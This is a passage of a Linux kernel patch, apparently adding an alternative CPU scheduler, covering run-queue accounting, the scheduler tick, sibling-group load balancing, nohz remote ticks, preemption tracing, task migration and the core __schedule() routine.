++ * race.  The caller is responsible to use it correctly, for example:
++ *
++ * - from a non-preemptible section (of course)
++ *
++ * - from a thread that is bound to a single CPU
++ *
++ * - in a loop with very short iterations (e.g. a polling loop)
++ */
++bool single_task_running(void)
++{
++	return raw_rq()->nr_running == 1;
++}
++EXPORT_SYMBOL(single_task_running);
++
++unsigned long long nr_context_switches(void)
++{
++	int i;
++	unsigned long long sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += cpu_rq(i)->nr_switches;
++
++	return sum;
++}
++
++/*
++ * Consumers of these two interfaces, like for example the cpuidle menu
++ * governor, are using nonsensical data. Preferring shallow idle state selection
++ * for a CPU that has IO-wait which might not even end up running the task when
++ * it does become runnable.
++ */
++
++unsigned int nr_iowait_cpu(int cpu)
++{
++	return atomic_read(&cpu_rq(cpu)->nr_iowait);
++}
++
++/*
++ * IO-wait accounting, and how it's mostly bollocks (on SMP).
++ *
++ * The idea behind IO-wait account is to account the idle time that we could
++ * have spend running if it were not for IO. That is, if we were to improve the
++ * storage performance, we'd have a proportional reduction in IO-wait time.
++ *
++ * This all works nicely on UP, where, when a task blocks on IO, we account
++ * idle time as IO-wait, because if the storage were faster, it could've been
++ * running and we'd not be idle.
++ *
++ * This has been extended to SMP, by doing the same for each CPU. This however
++ * is broken.
++ *
++ * Imagine for instance the case where two tasks block on one CPU, only the one
++ * CPU will have IO-wait accounted, while the other has regular idle. Even
++ * though, if the storage were faster, both could've ran at the same time,
++ * utilising both CPUs.
++ *
++ * This means, that when looking globally, the current IO-wait accounting on
++ * SMP is a lower bound, by reason of under accounting.
++ *
++ * Worse, since the numbers are provided per CPU, they are sometimes
++ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
++ * associated with any one particular CPU, it can wake to another CPU than it
++ * blocked on. This means the per CPU IO-wait number is meaningless.
++ *
++ * Task CPU affinities can make all that even more 'interesting'.
++ */
++
++unsigned int nr_iowait(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += nr_iowait_cpu(i);
++
++	return sum;
++}
++
++#ifdef CONFIG_SMP
++
++/*
++ * sched_exec - execve() is a valuable balancing opportunity, because at
++ * this point the task has the smallest effective memory and cache
++ * footprint.
++ */
++void sched_exec(void)
++{
++}
++
++#endif
++
++DEFINE_PER_CPU(struct kernel_stat, kstat);
++DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
++
++EXPORT_PER_CPU_SYMBOL(kstat);
++EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
++
++static inline void update_curr(struct rq *rq, struct task_struct *p)
++{
++	s64 ns = rq->clock_task - p->last_ran;
++
++	p->sched_time += ns;
++	cgroup_account_cputime(p, ns);
++	account_group_exec_runtime(p, ns);
++
++	p->time_slice -= ns;
++	p->last_ran = rq->clock_task;
++}
++
++/*
++ * Return accounted runtime for the task.
++ * Return separately the current's pending runtime that have not been
++ * accounted yet.
++ */
++unsigned long long task_sched_runtime(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	u64 ns;
++
++#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
++	/*
++	 * 64-bit doesn't need locks to atomically read a 64-bit value.
++	 * So we have a optimization chance when the task's delta_exec is 0.
++	 * Reading ->on_cpu is racy, but this is ok.
++	 *
++	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
++	 * If we race with it entering CPU, unaccounted time is 0. This is
++	 * indistinguishable from the read occurring a few cycles earlier.
++	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
++	 * been accounted, so we're correct here as well.
++	 */
++	if (!p->on_cpu || !task_on_rq_queued(p))
++		return tsk_seruntime(p);
++#endif
++
++	rq = task_access_lock_irqsave(p, &lock, &flags);
++	/*
++	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
++	 * project cycles that may never be accounted to this
++	 * thread, breaking clock_gettime().
++	 */
++	if (p == rq->curr && task_on_rq_queued(p)) {
++		update_rq_clock(rq);
++		update_curr(rq, p);
++	}
++	ns = tsk_seruntime(p);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++	return ns;
++}
++
++/* This manages tasks that have run out of timeslice during a scheduler_tick */
++static inline void scheduler_task_tick(struct rq *rq)
++{
++	struct task_struct *p = rq->curr;
++
++	if (is_idle_task(p))
++		return;
++
++	update_curr(rq, p);
++	cpufreq_update_util(rq, 0);
++
++	/*
++	 * Tasks have less than RESCHED_NS of time slice left they will be
++	 * rescheduled.
++	 */
++	if (p->time_slice >= RESCHED_NS)
++		return;
++	set_tsk_need_resched(p);
++	set_preempt_need_resched();
++}
++
++#ifdef CONFIG_SCHED_DEBUG
++static u64 cpu_resched_latency(struct rq *rq)
++{
++	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
++	u64 resched_latency, now = rq_clock(rq);
++	static bool warned_once;
++
++	if (sysctl_resched_latency_warn_once && warned_once)
++		return 0;
++
++	if (!need_resched() || !latency_warn_ms)
++		return 0;
++
++	if (system_state == SYSTEM_BOOTING)
++		return 0;
++
++	if (!rq->last_seen_need_resched_ns) {
++		rq->last_seen_need_resched_ns = now;
++		rq->ticks_without_resched = 0;
++		return 0;
++	}
++
++	rq->ticks_without_resched++;
++	resched_latency = now - rq->last_seen_need_resched_ns;
++	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
++		return 0;
++
++	warned_once = true;
++
++	return resched_latency;
++}
++
++static int __init setup_resched_latency_warn_ms(char *str)
++{
++	long val;
++
++	if ((kstrtol(str, 0, &val))) {
++		pr_warn("Unable to set resched_latency_warn_ms\n");
++		return 1;
++	}
++
++	sysctl_resched_latency_warn_ms = val;
++	return 1;
++}
++__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
++#else
++static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
++#endif /* CONFIG_SCHED_DEBUG */
++
++/*
++ * This function gets called by the timer code, with HZ frequency.
++ * We call it with interrupts disabled.
++ */
++void scheduler_tick(void)
++{
++	int cpu __maybe_unused = smp_processor_id();
++	struct rq *rq = cpu_rq(cpu);
++	u64 resched_latency;
++
++	arch_scale_freq_tick();
++	sched_clock_tick();
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	scheduler_task_tick(rq);
++	if (sched_feat(LATENCY_WARN))
++		resched_latency = cpu_resched_latency(rq);
++	calc_global_load_tick(rq);
++
++	rq->last_tick = rq->clock;
++	raw_spin_unlock(&rq->lock);
++
++	if (sched_feat(LATENCY_WARN) && resched_latency)
++		resched_latency_warn(cpu, resched_latency);
++
++	perf_event_task_tick();
++}
++
++#ifdef CONFIG_SCHED_SMT
++static inline int sg_balance_cpu_stop(void *data)
++{
++	struct rq *rq = this_rq();
++	struct task_struct *p = data;
++	cpumask_t tmp;
++	unsigned long flags;
++
++	local_irq_save(flags);
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++
++	rq->active_balance = 0;
++	/* _something_ may have changed the task, double check again */
++	if (task_on_rq_queued(p) && task_rq(p) == rq &&
++	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
++	    !is_migration_disabled(p)) {
++		int cpu = cpu_of(rq);
++		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
++		rq = move_queued_task(rq, p, dcpu);
++	}
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock(&p->pi_lock);
++
++	local_irq_restore(flags);
++
++	return 0;
++}
++
++/* sg_balance_trigger - trigger slibing group balance for @cpu */
++static inline int sg_balance_trigger(const int cpu)
++{
++	struct rq *rq= cpu_rq(cpu);
++	unsigned long flags;
++	struct task_struct *curr;
++	int res;
++
++	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
++		return 0;
++	curr = rq->curr;
++	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&\
++	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&\
++	      !is_migration_disabled(curr) && (!rq->active_balance);
++
++	if (res)
++		rq->active_balance = 1;
++
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	if (res)
++		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
++				    &rq->active_balance_work);
++	return res;
++}
++
++/*
++ * sg_balance - slibing group balance check for run queue @rq
++ */
++static inline void sg_balance(struct rq *rq)
++{
++	cpumask_t chk;
++	int cpu = cpu_of(rq);
++
++	/* exit when cpu is offline */
++	if (unlikely(!rq->online))
++		return;
++
++	/*
++	 * Only cpu in slibing idle group will do the checking and then
++	 * find potential cpus which can migrate the current running task
++	 */
++	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_rq_watermark) &&
++	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
++		int i;
++
++		for_each_cpu_wrap(i, &chk, cpu) {
++			if (cpumask_subset(cpu_smt_mask(i), &chk) &&
++			    sg_balance_trigger(i))
++				return;
++		}
++	}
++}
++#endif /* CONFIG_SCHED_SMT */
++
++#ifdef CONFIG_NO_HZ_FULL
++
++struct tick_work {
++	int			cpu;
++	atomic_t		state;
++	struct delayed_work	work;
++};
++/* Values for ->state, see diagram below. */
++#define TICK_SCHED_REMOTE_OFFLINE	0
++#define TICK_SCHED_REMOTE_OFFLINING	1
++#define TICK_SCHED_REMOTE_RUNNING	2
++
++/*
++ * State diagram for ->state:
++ *
++ *
++ *          TICK_SCHED_REMOTE_OFFLINE
++ *                    |   ^
++ *                    |   |
++ *                    |   | sched_tick_remote()
++ *                    |   |
++ *                    |   |
++ *                    +--TICK_SCHED_REMOTE_OFFLINING
++ *                    |   ^
++ *                    |   |
++ * sched_tick_start() |   | sched_tick_stop()
++ *                    |   |
++ *                    V   |
++ *          TICK_SCHED_REMOTE_RUNNING
++ *
++ *
++ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
++ * and sched_tick_start() are happy to leave the state in RUNNING.
++ */
++
++static struct tick_work __percpu *tick_work_cpu;
++
++static void sched_tick_remote(struct work_struct *work)
++{
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct tick_work *twork = container_of(dwork, struct tick_work, work);
++	int cpu = twork->cpu;
++	struct rq *rq = cpu_rq(cpu);
++	struct task_struct *curr;
++	unsigned long flags;
++	u64 delta;
++	int os;
++
++	/*
++	 * Handle the tick only if it appears the remote CPU is running in full
++	 * dynticks mode. The check is racy by nature, but missing a tick or
++	 * having one too much is no big deal because the scheduler tick updates
++	 * statistics and checks timeslices in a time-independent way, regardless
++	 * of when exactly it is running.
++	 */
++	if (!tick_nohz_tick_stopped_cpu(cpu))
++		goto out_requeue;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	curr = rq->curr;
++	if (cpu_is_offline(cpu))
++		goto out_unlock;
++
++	update_rq_clock(rq);
++	if (!is_idle_task(curr)) {
++		/*
++		 * Make sure the next tick runs within a reasonable
++		 * amount of time.
++		 */
++		delta = rq_clock_task(rq) - curr->last_ran;
++		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
++	}
++	scheduler_task_tick(rq);
++
++	calc_load_nohz_remote(rq);
++out_unlock:
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out_requeue:
++	/*
++	 * Run the remote tick once per second (1Hz). This arbitrary
++	 * frequency is large enough to avoid overload but short enough
++	 * to keep scheduler internal stats reasonably up to date.  But
++	 * first update state to reflect hotplug activity if required.
++	 */
++	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
++	if (os == TICK_SCHED_REMOTE_RUNNING)
++		queue_delayed_work(system_unbound_wq, dwork, HZ);
++}
++
++static void sched_tick_start(int cpu)
++{
++	int os;
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
++	if (os == TICK_SCHED_REMOTE_OFFLINE) {
++		twork->cpu = cpu;
++		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
++		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
++	}
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++static void sched_tick_stop(int cpu)
++{
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	cancel_delayed_work_sync(&twork->work);
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++int __init sched_tick_offload_init(void)
++{
++	tick_work_cpu = alloc_percpu(struct tick_work);
++	BUG_ON(!tick_work_cpu);
++	return 0;
++}
++
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_tick_start(int cpu) { }
++static inline void sched_tick_stop(int cpu) { }
++#endif
++
++#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
++				defined(CONFIG_PREEMPT_TRACER))
++/*
++ * If the value passed in is equal to the current preempt count
++ * then we just disabled preemption. Start timing the latency.
++ */
++static inline void preempt_latency_start(int val)
++{
++	if (preempt_count() == val) {
++		unsigned long ip = get_lock_parent_ip();
++#ifdef CONFIG_DEBUG_PREEMPT
++		current->preempt_disable_ip = ip;
++#endif
++		trace_preempt_off(CALLER_ADDR0, ip);
++	}
++}
++
++void preempt_count_add(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
++		return;
++#endif
++	__preempt_count_add(val);
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Spinlock count overflowing soon?
++	 */
++	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
++				PREEMPT_MASK - 10);
++#endif
++	preempt_latency_start(val);
++}
++EXPORT_SYMBOL(preempt_count_add);
++NOKPROBE_SYMBOL(preempt_count_add);
++
++/*
++ * If the value passed in equals to the current preempt count
++ * then we just enabled preemption. Stop timing the latency.
++ */
++static inline void preempt_latency_stop(int val)
++{
++	if (preempt_count() == val)
++		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
++}
++
++void preempt_count_sub(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
++		return;
++	/*
++	 * Is the spinlock portion underflowing?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
++			!(preempt_count() & PREEMPT_MASK)))
++		return;
++#endif
++
++	preempt_latency_stop(val);
++	__preempt_count_sub(val);
++}
++EXPORT_SYMBOL(preempt_count_sub);
++NOKPROBE_SYMBOL(preempt_count_sub);
++
++#else
++static inline void preempt_latency_start(int val) { }
++static inline void preempt_latency_stop(int val) { }
++#endif
++
++static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	return p->preempt_disable_ip;
++#else
++	return 0;
++#endif
++}
++
++/*
++ * Print scheduling while atomic bug:
++ */
++static noinline void __schedule_bug(struct task_struct *prev)
++{
++	/* Save this before calling printk(), since that will clobber it */
++	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
++
++	if (oops_in_progress)
++		return;
++
++	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
++		prev->comm, prev->pid, preempt_count());
++
++	debug_show_held_locks(prev);
++	print_modules();
++	if (irqs_disabled())
++		print_irqtrace_events(prev);
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
++	    && in_atomic_preempt_off()) {
++		pr_err("Preemption disabled at:");
++		print_ip_sym(KERN_ERR, preempt_disable_ip);
++	}
++	if (panic_on_warn)
++		panic("scheduling while atomic\n");
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++
++/*
++ * Various schedule()-time debugging checks and statistics:
++ */
++static inline void schedule_debug(struct task_struct *prev, bool preempt)
++{
++#ifdef CONFIG_SCHED_STACK_END_CHECK
++	if (task_stack_end_corrupted(prev))
++		panic("corrupted stack end detected inside scheduler\n");
++
++	if (task_scs_end_corrupted(prev))
++		panic("corrupted shadow stack detected inside scheduler\n");
++#endif
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
++		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
++			prev->comm, prev->pid, prev->non_block_count);
++		dump_stack();
++		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++	}
++#endif
++
++	if (unlikely(in_atomic_preempt_off())) {
++		__schedule_bug(prev);
++		preempt_count_set(PREEMPT_DISABLED);
++	}
++	rcu_sleep_check();
++	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
++
++	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
++
++	schedstat_inc(this_rq()->sched_count);
++}
++
++/*
++ * Compile time debug macro
++ * #define ALT_SCHED_DEBUG
++ */
++
++#ifdef ALT_SCHED_DEBUG
++void alt_sched_debug(void)
++{
++	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
++	       sched_rq_pending_mask.bits[0],
++	       sched_rq_watermark[0].bits[0],
++	       sched_sg_idle_mask.bits[0]);
++}
++#else
++inline void alt_sched_debug(void) {}
++#endif
++
++#ifdef	CONFIG_SMP
++
++#ifdef CONFIG_PREEMPT_RT
++#define SCHED_NR_MIGRATE_BREAK 8
++#else
++#define SCHED_NR_MIGRATE_BREAK 32
++#endif
++
++const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
++
++/*
++ * Migrate pending tasks in @rq to @dest_cpu
++ */
++static inline int
++migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
++{
++	struct task_struct *p, *skip = rq->curr;
++	int nr_migrated = 0;
++	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
++
++	while (skip != rq->idle && nr_tries &&
++	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
++		skip = sched_rq_next_task(p, rq);
++		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
++			__SCHED_DEQUEUE_TASK(p, rq, 0);
++			set_task_cpu(p, dest_cpu);
++			sched_task_sanity_check(p, dest_rq);
++			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
++			nr_migrated++;
++		}
++		nr_tries--;
++	}
++
++	return nr_migrated;
++}
++
++static inline int take_other_rq_tasks(struct rq *rq, int cpu)
++{
++	struct cpumask *topo_mask, *end_mask;
++
++	if (unlikely(!rq->online))
++		return 0;
++
++	if (cpumask_empty(&sched_rq_pending_mask))
++		return 0;
++
++	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
++	do {
++		int i;
++		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
++			int nr_migrated;
++			struct rq *src_rq;
++
++			src_rq = cpu_rq(i);
++			if (!do_raw_spin_trylock(&src_rq->lock))
++				continue;
++			spin_acquire(&src_rq->lock.dep_map,
++				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
++
++			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
++				src_rq->nr_running -= nr_migrated;
++				if (src_rq->nr_running < 2)
++					cpumask_clear_cpu(i, &sched_rq_pending_mask);
++
++				rq->nr_running += nr_migrated;
++				if (rq->nr_running > 1)
++					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
++
++				cpufreq_update_util(rq, 0);
++
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
++				return 1;
++			}
++
++			spin_release(&src_rq->lock.dep_map, _RET_IP_);
++			do_raw_spin_unlock(&src_rq->lock);
++		}
++	} while (++topo_mask < end_mask);
++
++	return 0;
++}
++#endif
++
++/*
++ * Timeslices below RESCHED_NS are considered as good as expired as there's no
++ * point rescheduling when there's so little time left.
++ */
++static inline void check_curr(struct task_struct *p, struct rq *rq)
++{
++	if (unlikely(rq->idle == p))
++		return;
++
++	update_curr(rq, p);
++
++	if (p->time_slice < RESCHED_NS)
++		time_slice_expired(p, rq);
++}
++
++static inline struct task_struct *
++choose_next_task(struct rq *rq, int cpu, struct task_struct *prev)
++{
++	struct task_struct *next;
++
++	if (unlikely(rq->skip)) {
++		next = rq_runnable_task(rq);
++		if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++			if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++				rq->skip = NULL;
++				schedstat_inc(rq->sched_goidle);
++				return next;
++#ifdef	CONFIG_SMP
++			}
++			next = rq_runnable_task(rq);
++#endif
++		}
++		rq->skip = NULL;
++#ifdef CONFIG_HIGH_RES_TIMERS
++		hrtick_start(rq, next->time_slice);
++#endif
++		return next;
++	}
++
++	next = sched_rq_first_task(rq);
++	if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++		if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++			schedstat_inc(rq->sched_goidle);
++			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
++			return next;
++#ifdef	CONFIG_SMP
++		}
++		next = sched_rq_first_task(rq);
++#endif
++	}
++#ifdef CONFIG_HIGH_RES_TIMERS
++	hrtick_start(rq, next->time_slice);
++#endif
++	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
++	 * next);*/
++	return next;
++}
++
++/*
++ * Constants for the sched_mode argument of __schedule().
++ *
++ * The mode argument allows RT enabled kernels to differentiate a
++ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
++ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
++ * optimize the AND operation out and just check for zero.
++ */
++#define SM_NONE			0x0
++#define SM_PREEMPT		0x1
++#define SM_RTLOCK_WAIT		0x2
++
++#ifndef CONFIG_PREEMPT_RT
++# define SM_MASK_PREEMPT	(~0U)
++#else
++# define SM_MASK_PREEMPT	SM_PREEMPT
++#endif
++
++/*
++ * schedule() is the main scheduler function.
++ *
++ * The main means of driving the scheduler and thus entering this function are:
++ *
++ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
++ *
++ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
++ *      paths. For example, see arch/x86/entry_64.S.
++ *
++ *      To drive preemption between tasks, the scheduler sets the flag in timer
++ *      interrupt handler scheduler_tick().
++ *
++ *   3. Wakeups don't really cause entry into schedule(). They add a
++ *      task to the run-queue and that's it.
++ *
++ *      Now, if the new task added to the run-queue preempts the current
++ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
++ *      called on the nearest possible occasion:
++ *
++ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
++ *
++ *         - in syscall or exception context, at the next outmost
++ *           preempt_enable(). (this might be as soon as the wake_up()'s
++ *           spin_unlock()!)
++ *
++ *         - in IRQ context, return from interrupt-handler to
++ *           preemptible context
++ *
++ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
++ *         then at the next:
++ *
++ *          - cond_resched() call
++ *          - explicit schedule() call
++ *          - return from syscall or exception to user-space
++ *          - return from interrupt-handler to user-space
++ *
++ * WARNING: must be called with preemption disabled!
++ */
++static void __sched notrace __schedule(unsigned int sched_mode)
++{
++	struct task_struct *prev, *next;
++	unsigned long *switch_count;
++	unsigned long prev_state;
++	struct rq *rq;
++	int cpu;
++	int deactivated = 0;
++
++	cpu = smp_processor_id();
++	rq = cpu_rq(cpu);
++	prev = rq->curr;
++
++	schedule_debug(prev, !!sched_mode);
++
++	/* by passing sched_feat(HRTICK) checking which Alt schedule FW doesn't support */
++	hrtick_clear(rq);
++
++	local_irq_disable();
++	rcu_note_context_switch(!!sched_mode);
++
++	/*
++	 * Make sure that signal_pending_state()->signal_pending() below
++	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
++	 * done by the caller to avoid the race with signal_wake_up():
++	 *
++	 * __set_current_state(@state)		signal_wake_up()
++	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
++	 *					  wake_up_state(p, state)
++	 *   LOCK rq->lock			    LOCK p->pi_state
++	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
++	 *     if (signal_pending_state())	    if (p->state & @state)
++	 *
++	 * Also, the membarrier system call requires a full memory barrier
++	 * after coming from user-space, before storing to rq->curr.
++	 */
++	raw_spin_lock(&rq->lock);
++	smp_mb__after_spinlock();
++
++	update_rq_clock(rq);
++
++	switch_count = &prev->nivcsw;
++	/*
++	 * We must load prev->state once (task_struct::state is volatile), such
++	 * that we form a control dependency vs deactivate_task() below.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
++		if (signal_pending_state(prev_state, prev)) {
++			WRITE_ONCE(prev->__state, TASK_RUNNING);
++		} else {
++			prev->sched_contributes_to_load =
++				(prev_state & TASK_UNINTERRUPTIBLE) &&
++				!(prev_state & TASK_NOLOAD) &&
++				!(prev->flags & TASK_FROZEN);
++
++			if (prev->sched_contributes_to_load)
++				rq->nr_uninterruptible++;
++
++			/*
++			 * __schedule()			ttwu()
++			 *   prev_state = prev->state;    if (p->on_rq && ...)
++			 *   if (prev_state)		    goto out;
++			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
++			 *				  p->state = TASK_WAKING
++			 *
++			 * Where __schedule() and ttwu() have matching control dependencies.
++			 *
++			 * After this, schedule() must not care about p->state any more.
++			 */
++			sched_task_deactivate(prev, rq);
++			deactivate_task(prev, rq);
++			deactivated = 1;
++
++			if (prev->in_iowait) {
++				atomic_inc(&rq->nr_iowait);
++				delayacct_blkio_start();
++			}
++		}
++		switch_count = &prev->nvcsw;
++	}
++
++	check_curr(prev, rq);
++
++	next = choose_next_task(rq, cpu, prev);
++	clear_tsk_need_resched(prev);
++	clear_preempt_need_resched();
++#ifdef CONFIG_SCHED_DEBUG
++	rq->last_seen_need_resched_ns = 0;
++#endif
++
++	if (likely(prev != next)) {
++		if (deactivated)
++			update_sched_rq_watermark(rq);
++		next->last_ran = rq->clock_task;
++		rq->last_ts_switch = rq->clock;
++
++		rq->nr_switches++;
++		/*
++		 * RCU users of rcu_dereference(rq->curr) may not see
++		 * changes to task_struct made by pick_next_task().
++		 */
++		RCU_INIT_POINTER(rq->curr, next);
++		/*
++		 * The membarrier system call requires each architecture
++		 * to have a full memory barrier after updating
++		 * rq->curr, before returning to user-space.
++		 *
++		 * Here are the schemes providing that barrier on the
++		 * various architectures:
++		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
++		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
++		 * - finish_lock_switch() for weakly-ordered
++		 *   architectures where spin_unlock is a full barrier,
++		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
++		 *   is a RELEASE barrier),
++		 */
++		++*switch_count;
++
++		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
++
++		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
++
++		/* Also unlocks the rq: */
++		rq = context_switch(rq, prev, next);
++	} else {
++		__balance_callbacks(rq);
++		raw_spin_unlock_irq(&rq->lock);
++	}
++
++#ifdef CONFIG_SCHED_SMT
++	sg_balance(rq);
++#endif
++}
++
++void __noreturn do_task_dead(void)
++{
++	/* Causes final put_task_struct in finish_task_switch(): */
++	set_special_state(TASK_DEAD);
++
++	/* Tell freezer to ignore us: */
++	current->flags |= PF_NOFREEZE;
++
++	__schedule(SM_NONE);
++	BUG();
++
++	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
++	for (;;)
++		cpu_relax();
++}
++
++static inline void sched_submit_work(struct task_struct *tsk)
++{
++	unsigned int task_flags;
++
++	if (task_is_running(tsk))
++		return;
++
++	task_flags = tsk->flags;
++	/*
++	 * If a worker goes to sleep, notify and ask workqueue whether it
++	 * wants to wake up a task to maintain concurrency.
++	 */
++	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (task_flags & PF_WQ_WORKER)
++			wq_worker_sleeping(tsk);
++		else
++			io_wq_worker_sleeping(tsk);
++	}
++
++	/*
++	 * spinlock and rwlock must not flush block requests.  This will
++	 * deadlock if the callback attempts to acquire a lock which is
++	 * already acquired.
++	 */
++	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
++
++	/*
++	 * If we are going to sleep and we have plugged IO queued,
++	 * make sure to submit it to avoid deadlocks.
++	 */
++	blk_flush_plug(tsk->plug, true);
++}
++
++static void sched_update_worker(struct task_struct *tsk)
++{
++	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (tsk->flags & PF_WQ_WORKER)
++			wq_worker_running(tsk);
++		else
++			io_wq_worker_running(tsk);
++	}
++}
++
++asmlinkage __visible void __sched schedule(void)
++{
++	struct task_struct *tsk = current;
++
++	sched_submit_work(tsk);
++	do {
++		preempt_disable();
++		__schedule(SM_NONE);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++	sched_update_worker(tsk);
++}
++EXPORT_SYMBOL(schedule);
++
++/*
++ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
++ * state (have scheduled out non-voluntarily) by making sure that all
